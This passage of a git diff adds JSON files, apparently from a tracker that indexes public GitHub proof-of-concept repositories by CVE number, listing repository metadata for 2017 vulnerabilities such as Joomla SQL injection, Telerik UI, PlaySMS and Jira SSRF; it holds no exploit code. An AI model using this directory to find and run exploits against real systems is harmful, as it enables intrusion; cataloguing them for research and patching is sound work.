+1,33 @@ +[ + { + "id": 235548506, + "name": "CVE-2017-8809_MediaWiki_RFD", + "full_name": "motikan2010\/CVE-2017-8809_MediaWiki_RFD", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2017-8809_MediaWiki_RFD", + "description": "CVE-2017-8809 Docker - RFD(Reflected File Download) for MediaWiki", + "fork": false, + "created_at": "2020-01-22T10:21:51Z", + "updated_at": "2024-06-26T12:07:34Z", + "pushed_at": "2020-01-22T10:27:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8890.json b/2017/CVE-2017-8890.json new file mode 100644 index 0000000000..6671276875 --- /dev/null +++ b/2017/CVE-2017-8890.json @@ -0,0 +1,95 @@ +[ + { + "id": 96664720, + "name": "CVE-2017-8890", + "full_name": "beraphin\/CVE-2017-8890", + "owner": { + "login": "beraphin", + "id": 25315905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315905?v=4", + "html_url": "https:\/\/github.com\/beraphin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/beraphin\/CVE-2017-8890", + "description": "None", + "fork": false, + "created_at": "2017-07-09T06:03:37Z", + "updated_at": "2024-08-27T00:45:28Z", + "pushed_at": "2018-08-25T16:09:21Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 22, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 139380646, + "name": "CVE-2017-8890", + "full_name": "thinkycx\/CVE-2017-8890", + "owner": { + "login": "thinkycx", + "id": 13138128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13138128?v=4", + "html_url": "https:\/\/github.com\/thinkycx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinkycx\/CVE-2017-8890", + "description": null, + "fork": false, + "created_at": "2018-07-02T02:21:28Z", + "updated_at": "2024-08-26T18:38:39Z", + "pushed_at": "2019-05-09T07:07:25Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 35, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 184697347, + "name": "cve-2017-8890-msf", + "full_name": "7043mcgeep\/cve-2017-8890-msf", + "owner": { + "login": "7043mcgeep", + "id": 27043910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27043910?v=4", + "html_url": "https:\/\/github.com\/7043mcgeep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7043mcgeep\/cve-2017-8890-msf", + "description": "For Metasploit pull request", + "fork": false, + "created_at": "2019-05-03T04:14:17Z", + "updated_at": "2019-05-03T04:20:45Z", + "pushed_at": "2019-05-03T04:20:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8917.json b/2017/CVE-2017-8917.json new file mode 100644 index 0000000000..6c4e30752e --- /dev/null +++ b/2017/CVE-2017-8917.json @@ -0,0 +1,281 @@ +[ + { + "id": 91819199, + "name": "Joomla3.7-SQLi-CVE-2017-8917", + "full_name": "brianwrf\/Joomla3.7-SQLi-CVE-2017-8917", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/Joomla3.7-SQLi-CVE-2017-8917", + "description": "Joomla 3.7 SQL injection (CVE-2017-8917)", + "fork": false, + "created_at": "2017-05-19T15:21:46Z", + "updated_at": "2023-11-03T11:01:57Z", + "pushed_at": "2017-05-19T15:30:18Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 111313970, + "name": "Exploit-Joomla", + "full_name": "stefanlucas\/Exploit-Joomla", + "owner": { + "login": "stefanlucas", + "id": 27380068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27380068?v=4", + "html_url": "https:\/\/github.com\/stefanlucas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stefanlucas\/Exploit-Joomla", + "description": "CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 ", + "fork": false, + "created_at": "2017-11-19T16:50:39Z", + "updated_at": "2024-10-02T09:53:46Z", + "pushed_at": "2022-03-07T20:04:08Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 165318193, + "name": "cve-2017-8917", + "full_name": "cved-sources\/cve-2017-8917", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-8917", + "description": "cve-2017-8917", + "fork": false, + "created_at": "2019-01-11T22:13:56Z", + "updated_at": "2021-04-15T21:29:20Z", + "pushed_at": "2021-04-15T21:29:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458793708, + "name": "CVE-2017-8917", + "full_name": "gmohlamo\/CVE-2017-8917", + "owner": { + "login": "gmohlamo", + "id": 25582653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25582653?v=4", + "html_url": "https:\/\/github.com\/gmohlamo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmohlamo\/CVE-2017-8917", + "description": "Python exploit for CVE-2017-8917 - Joomla 3.7.0 'com_fields' SQL Injection", + "fork": false, + "created_at": "2022-02-13T11:49:00Z", + "updated_at": "2022-08-29T11:47:25Z", + "pushed_at": "2021-05-27T13:58:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481353213, + "name": "CVE-2017-8917-Joomla-370-SQL-Injection", + "full_name": "AkuCyberSec\/CVE-2017-8917-Joomla-370-SQL-Injection", + "owner": { + "login": "AkuCyberSec", + "id": 103601332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103601332?v=4", + "html_url": "https:\/\/github.com\/AkuCyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkuCyberSec\/CVE-2017-8917-Joomla-370-SQL-Injection", + "description": null, + "fork": false, + "created_at": "2022-04-13T19:44:19Z", + "updated_at": "2023-05-26T07:04:53Z", + "pushed_at": "2022-04-13T19:46:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530196821, + "name": "CVE-2017-8917", + "full_name": "Siopy\/CVE-2017-8917", + "owner": { + "login": "Siopy", + "id": 37114131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37114131?v=4", + "html_url": "https:\/\/github.com\/Siopy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Siopy\/CVE-2017-8917", + "description": "CVE-2017-8917 - Joomla 3.7.0 'com_fields' SQL Injection", + "fork": false, + "created_at": "2022-08-29T11:51:00Z", + "updated_at": "2022-08-29T11:54:35Z", + "pushed_at": "2022-08-29T11:54:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 590121307, + "name": "joomla_CVE-2017-8917", + "full_name": "ionutbaltariu\/joomla_CVE-2017-8917", + "owner": { + "login": "ionutbaltariu", + "id": 65487796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65487796?v=4", + "html_url": "https:\/\/github.com\/ionutbaltariu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ionutbaltariu\/joomla_CVE-2017-8917", + "description": "Project for the Cyberspace Security class.", + "fork": false, + "created_at": "2023-01-17T17:47:22Z", + "updated_at": "2023-01-17T17:47:22Z", + "pushed_at": "2023-01-17T17:51:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 721311875, + "name": "CVE-2017-8917-Joomla", + "full_name": "BaptisteContreras\/CVE-2017-8917-Joomla", + "owner": { + "login": "BaptisteContreras", + "id": 38988658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38988658?v=4", + "html_url": "https:\/\/github.com\/BaptisteContreras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaptisteContreras\/CVE-2017-8917-Joomla", + "description": "CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit", + "fork": false, + "created_at": "2023-11-20T19:50:57Z", + "updated_at": "2023-11-20T20:13:15Z", + "pushed_at": "2023-11-27T14:38:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810930308, + "name": "Joomblah", + "full_name": "gloliveira1701\/Joomblah", + "owner": { + "login": "gloliveira1701", + "id": 78177891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78177891?v=4", + "html_url": "https:\/\/github.com\/gloliveira1701", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gloliveira1701\/Joomblah", + "description": "CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit", + "fork": false, + "created_at": "2024-06-05T16:07:51Z", + "updated_at": "2024-06-05T16:32:02Z", + "pushed_at": "2024-06-05T16:31:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9096.json b/2017/CVE-2017-9096.json new file mode 100644 index 0000000000..4327ab1836 --- /dev/null +++ b/2017/CVE-2017-9096.json @@ -0,0 +1,33 @@ +[ + { + "id": 493607609, + "name": "CVE-2017-9096-iText-XXE", + "full_name": "jakabakos\/CVE-2017-9096-iText-XXE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2017-9096-iText-XXE", + "description": null, + "fork": false, + "created_at": "2022-05-18T10:03:53Z", + "updated_at": "2024-09-14T14:22:11Z", + "pushed_at": "2022-05-18T10:08:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9097.json b/2017/CVE-2017-9097.json new file mode 100644 index 0000000000..786b5787a3 --- /dev/null +++ b/2017/CVE-2017-9097.json @@ -0,0 +1,33 @@ +[ + { + "id": 116008243, + "name": "AntiWeb_testing-Suite", + "full_name": "MDudek-ICS\/AntiWeb_testing-Suite", + "owner": { + "login": "MDudek-ICS", + "id": 31083304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31083304?v=4", + "html_url": "https:\/\/github.com\/MDudek-ICS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MDudek-ICS\/AntiWeb_testing-Suite", + "description": "Suite de herramientas que sacan partido del CVE-2017-9097 (+RCE)", + "fork": false, + "created_at": "2018-01-02T11:28:40Z", + "updated_at": "2024-08-12T19:35:12Z", + "pushed_at": "2017-11-21T20:19:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9101.json b/2017/CVE-2017-9101.json new file mode 100644 index 0000000000..da892415a7 --- /dev/null +++ b/2017/CVE-2017-9101.json @@ -0,0 +1,37 @@ +[ + { + "id": 156434987, + "name": "CVE-2017-9101", + "full_name": "jasperla\/CVE-2017-9101", + "owner": { + "login": "jasperla", + "id": 637504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/637504?v=4", + "html_url": "https:\/\/github.com\/jasperla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jasperla\/CVE-2017-9101", + "description": "Exploit for PlaySMS 1.4 authenticated RCE", + "fork": false, + "created_at": "2018-11-06T19:16:29Z", + "updated_at": "2023-10-05T17:05:05Z", + "pushed_at": "2018-11-06T19:45:40Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-9101", + "playsms", + "python" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9248.json b/2017/CVE-2017-9248.json new file mode 100644 index 0000000000..6932410ac6 --- /dev/null +++ b/2017/CVE-2017-9248.json @@ -0,0 +1,224 @@ +[ + { + "id": 117610085, + "name": "dp_crypto", + "full_name": "bao7uo\/dp_crypto", + "owner": { + "login": "bao7uo", + "id": 21125224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21125224?v=4", + "html_url": "https:\/\/github.com\/bao7uo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bao7uo\/dp_crypto", + "description": "Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)", + "fork": false, + "created_at": "2018-01-16T00:23:34Z", + "updated_at": "2024-10-31T14:02:51Z", + "pushed_at": "2020-12-22T03:10:47Z", + "stargazers_count": 165, + "watchers_count": 165, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 165, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 143378191, + "name": "Telewreck", + "full_name": "capt-meelo\/Telewreck", + "owner": { + "login": "capt-meelo", + "id": 40536834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40536834?v=4", + "html_url": "https:\/\/github.com\/capt-meelo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/capt-meelo\/Telewreck", + "description": "A Burp extension to detect and exploit versions of Telerik Web UI vulnerable to CVE-2017-9248.", + "fork": false, + "created_at": "2018-08-03T04:36:23Z", + "updated_at": "2024-08-12T19:40:32Z", + "pushed_at": "2018-08-14T07:47:02Z", + "stargazers_count": 97, + "watchers_count": 97, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 97, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 217070902, + "name": "CVE-2017-9248", + "full_name": "ictnamanh\/CVE-2017-9248", + "owner": { + "login": "ictnamanh", + "id": 39141894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39141894?v=4", + "html_url": "https:\/\/github.com\/ictnamanh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ictnamanh\/CVE-2017-9248", + "description": null, + "fork": false, + "created_at": "2019-10-23T13:57:11Z", + "updated_at": "2019-10-23T14:02:06Z", + "pushed_at": "2019-10-23T14:02:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 370443318, + "name": "dp", + "full_name": "oldboysonnt\/dp", + "owner": { + "login": "oldboysonnt", + "id": 44519666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44519666?v=4", + "html_url": "https:\/\/github.com\/oldboysonnt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oldboysonnt\/dp", + "description": "Exploit CVE-2017-9248 Telerik ReMix from Paul Taylor's script. Exploit Telerik lastest version fixed vuln. ReMix by TinoKa & Shaco JX", + "fork": false, + "created_at": "2021-05-24T18:07:03Z", + "updated_at": "2021-05-24T18:07:04Z", + "pushed_at": "2020-01-21T03:58:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 545710254, + "name": "dp_cryptomg", + "full_name": "blacklanternsecurity\/dp_cryptomg", + "owner": { + "login": "blacklanternsecurity", + "id": 25311592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25311592?v=4", + "html_url": "https:\/\/github.com\/blacklanternsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blacklanternsecurity\/dp_cryptomg", + "description": "Another tool for exploiting CVE-2017-9248, a cryptographic weakness in Telerik UI for ASP.NET AJAX dialog handler.", + "fork": false, + "created_at": "2022-10-04T21:09:27Z", + "updated_at": "2024-11-12T06:39:16Z", + "pushed_at": "2024-08-21T20:42:45Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cryptography", + "cve-2017-9248", + "telerik-ui", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 649479920, + "name": "UI_CVE-2017-9248", + "full_name": "cehamod\/UI_CVE-2017-9248", + "owner": { + "login": "cehamod", + "id": 134844770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134844770?v=4", + "html_url": "https:\/\/github.com\/cehamod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cehamod\/UI_CVE-2017-9248", + "description": "Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)", + "fork": false, + "created_at": "2023-06-05T00:48:24Z", + "updated_at": "2023-06-05T00:53:59Z", + "pushed_at": "2023-06-05T00:53:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830080580, + "name": "CVE-2017-9248", + "full_name": "hlong12042\/CVE-2017-9248", + "owner": { + "login": "hlong12042", + "id": 58381595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58381595?v=4", + "html_url": "https:\/\/github.com\/hlong12042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hlong12042\/CVE-2017-9248", + "description": null, + "fork": false, + "created_at": "2024-07-17T14:49:07Z", + "updated_at": "2024-07-17T15:31:03Z", + "pushed_at": "2024-07-17T15:31:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9417.json b/2017/CVE-2017-9417.json new file mode 100644 index 0000000000..f7555a9ffe --- /dev/null +++ b/2017/CVE-2017-9417.json @@ -0,0 +1,33 @@ +[ + { + "id": 98761662, + "name": "Broadpwn", + "full_name": "mailinneberg\/Broadpwn", + "owner": { + "login": "mailinneberg", + "id": 29992468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29992468?v=4", + "html_url": "https:\/\/github.com\/mailinneberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mailinneberg\/Broadpwn", + "description": "Broadpwn bug (CVE-2017-9417)", + "fork": false, + "created_at": "2017-07-29T22:23:34Z", + "updated_at": "2023-11-22T16:48:55Z", + "pushed_at": "2017-09-22T12:14:25Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 51, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9430.json b/2017/CVE-2017-9430.json new file mode 100644 index 0000000000..e5a39d6815 --- /dev/null +++ b/2017/CVE-2017-9430.json @@ -0,0 +1,64 @@ +[ + { + "id": 93714446, + "name": "CVE-2017-9430", + "full_name": "homjxi0e\/CVE-2017-9430", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-9430", + "description": null, + "fork": false, + "created_at": "2017-06-08T06:22:37Z", + "updated_at": "2017-06-08T06:30:44Z", + "pushed_at": "2017-06-08T06:30:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 111662357, + "name": "Dnstracer-1.9-Fix", + "full_name": "j0lama\/Dnstracer-1.9-Fix", + "owner": { + "login": "j0lama", + "id": 17393029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17393029?v=4", + "html_url": "https:\/\/github.com\/j0lama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j0lama\/Dnstracer-1.9-Fix", + "description": "CVE-2017-9430 Fix", + "fork": false, + "created_at": "2017-11-22T09:19:53Z", + "updated_at": "2017-11-22T09:23:55Z", + "pushed_at": "2017-11-22T09:40:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9476.json b/2017/CVE-2017-9476.json new file mode 100644 index 0000000000..e1bd3c8fb4 --- /dev/null +++ b/2017/CVE-2017-9476.json @@ -0,0 +1,35 @@ +[ + { + "id": 106408008, + "name": "CVE-2017-9476", + "full_name": "wiire-a\/CVE-2017-9476", + "owner": { + "login": "wiire-a", + "id": 11740772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11740772?v=4", + "html_url": "https:\/\/github.com\/wiire-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wiire-a\/CVE-2017-9476", + "description": "Hidden AP with Deterministic Credentials", + "fork": false, + "created_at": "2017-10-10T11:25:36Z", + "updated_at": "2024-08-31T04:16:05Z", + "pushed_at": "2017-10-10T11:26:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "wifi-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9506.json b/2017/CVE-2017-9506.json new file mode 100644 index 0000000000..4ba6024b8c --- /dev/null +++ b/2017/CVE-2017-9506.json @@ -0,0 +1,102 @@ +[ + { + "id": 130995909, + "name": "Jira-Scan", + "full_name": "random-robbie\/Jira-Scan", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/Jira-Scan", + "description": "CVE-2017-9506 - SSRF", + "fork": false, + "created_at": "2018-04-25T11:25:18Z", + "updated_at": "2024-11-05T04:49:25Z", + "pushed_at": "2022-02-14T22:00:28Z", + "stargazers_count": 187, + "watchers_count": 187, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "jira", + "ssrf" + ], + "visibility": "public", + "forks": 45, + "watchers": 187, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 216503835, + "name": "jira-ssrf", + "full_name": "pwn1sher\/jira-ssrf", + "owner": { + "login": "pwn1sher", + "id": 17316522, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17316522?v=4", + "html_url": "https:\/\/github.com\/pwn1sher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwn1sher\/jira-ssrf", + "description": "CVE-2017-9506", + "fork": false, + "created_at": "2019-10-21T07:26:18Z", + "updated_at": "2019-10-21T07:27:43Z", + "pushed_at": "2019-10-21T07:27:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477397539, + "name": "CVE-2017-9506", + "full_name": "labsbots\/CVE-2017-9506", + "owner": { + "login": "labsbots", + "id": 101962028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101962028?v=4", + "html_url": "https:\/\/github.com\/labsbots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/labsbots\/CVE-2017-9506", + "description": "Atlassian Jira XSS attack via Server Side Request Forgery (SSRF).", + "fork": false, + "created_at": "2022-04-03T16:23:13Z", + "updated_at": "2024-08-12T20:22:07Z", + "pushed_at": "2022-04-03T16:26:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "jira", + "jira-plugin" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9544.json b/2017/CVE-2017-9544.json new file mode 100644 index 0000000000..179ee361d7 --- /dev/null +++ b/2017/CVE-2017-9544.json @@ -0,0 +1,33 @@ +[ + { + "id": 163818646, + "name": "CVE-2017-9544", + "full_name": "adenkiewicz\/CVE-2017-9544", + "owner": { + "login": "adenkiewicz", + "id": 1060275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2017-9544", + "description": "SEH BO based exploit for Easy Chat Server on Win 7 32b", + "fork": false, + "created_at": "2019-01-02T09:08:58Z", + "updated_at": "2024-10-18T22:29:03Z", + "pushed_at": "2019-01-02T09:10:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9554.json b/2017/CVE-2017-9554.json new file mode 100644 index 0000000000..0476e6b280 --- /dev/null +++ b/2017/CVE-2017-9554.json @@ -0,0 +1,64 @@ +[ + { + "id": 146395130, + "name": "Synology-DiskStation-User-Enumeration-CVE-2017-9554-", + "full_name": "rfcl\/Synology-DiskStation-User-Enumeration-CVE-2017-9554-", + "owner": { + "login": "rfcl", + "id": 